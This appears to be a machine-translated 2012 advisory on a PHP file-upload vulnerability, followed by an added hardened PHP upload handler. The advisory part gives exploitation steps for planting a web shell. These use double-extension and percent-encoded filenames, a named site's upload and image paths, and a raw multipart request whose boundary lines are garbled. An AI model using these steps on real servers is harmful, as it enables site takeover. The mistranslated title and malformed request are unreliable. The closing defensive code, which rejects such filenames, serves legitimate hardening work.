PHP. S3. TO upload the exploit-vulnerability warning-the black bar safety net

2012-08-29T00:00:00
ID MYHACK58:62201234753
Type myhack58
Reporter Anonymous
Modified 2012-08-29T00:00:00

Description

PHP S3 upload vulnerability

This web vulnerability is fairly serious: it can be used to obtain a shell directly. The exploitation method is given below.

Vulnerability information:

Files in PHP, TXT, JPG and PNG format can be uploaded arbitrarily.

Change your shell to sh3ll.php.jpg or sh3ll.php%0%0.1.jpg

Exploit demo:

Use:

hackqing.com/[dir]/up/upload.php

Load the file:

hackqing.com/[dir]/up/img/Sh3ll.php.jpg

Core code of the vulnerability:

114782935826962\r\nContent-Disposition: form-data; name="MAX_FILE_SIZE"\r\n\r\n1048576\r\n
-114782935826962\r\nContent-Disposition: form-data;name="upfile"; filename="sh3ll.php.jpg"\r\nContent-Type: text/plain\r\n\r\n\r\n
-----------------------------114782935826962\r\nContent-Disposition: form-data; name="pass"\r\n\r\n\r\n
--114782935826962\r\nContent-Disposition:form-data; name="com"\r\n\r\n\r\n
-----------------------------114782935826962--\r\n
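On the defending side, the request above succeeds only if the handler trusts the client-supplied filename and Content-Type of the "upfile" part. The following is an added example, not code from the original advisory or from the affected application: a hardened handler for that field, in which the storage path, the allow-list and the function names are assumptions.

```php
<?php
// Added example: hardened handler for the "upfile" form field (hypothetical code).
// Assumption: STORE_DIR lies outside the web root and is never mapped to a PHP handler.
const STORE_DIR = '/var/app-data/uploads';
const ALLOWED = ['image/jpeg' => 'jpg', 'image/png' => 'png'];

// Pure check: returns the extension for the stored copy, or null to reject.
function safe_extension(string $clientName, string $detectedMime): ?string
{
    // Reject control bytes (incl. NUL), percent-escapes such as "%0", and path separators.
    if (preg_match('/[\x00-\x1f%\/\\\\]/', $clientName)) {
        return null;
    }
    // Inspect every dot-separated segment, not only the last one:
    // "sh3ll.php.jpg" has the segments ["sh3ll", "php", "jpg"].
    $segments = explode('.', strtolower($clientName));
    array_shift($segments);                            // drop the base name
    foreach ($segments as $seg) {
        if (preg_match('/^(php\d?|phtml|phar|pht|cgi|pl|asp|aspx|jsp|sh)$/', $seg)) {
            return null;
        }
    }
    // The extension comes from the sniffed content, never from the client.
    return ALLOWED[$detectedMime] ?? null;
}

function store_upload(array $file): string
{
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK
        || !is_uploaded_file($file['tmp_name'])) {
        throw new RuntimeException('upload failed');
    }
    // Ignore $file['type']: it is the client-sent Content-Type header.
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($file['tmp_name']);
    $ext  = safe_extension($file['name'], (string) $mime);
    if ($ext === null) {
        throw new RuntimeException('file rejected');
    }
    // Server-generated name: no client-controlled characters reach the disk.
    $dest = STORE_DIR . '/' . bin2hex(random_bytes(16)) . '.' . $ext;
    if (!move_uploaded_file($file['tmp_name'], $dest)) {
        throw new RuntimeException('could not store file');
    }
    return $dest;
}

if (isset($_FILES['upfile'])) {
    echo basename(store_upload($_FILES['upfile']));
}
```

With this check, both filenames given above are rejected: sh3ll.php.jpg because of its inner "php" segment, and sh3ll.php%0%0.1.jpg because of the percent character.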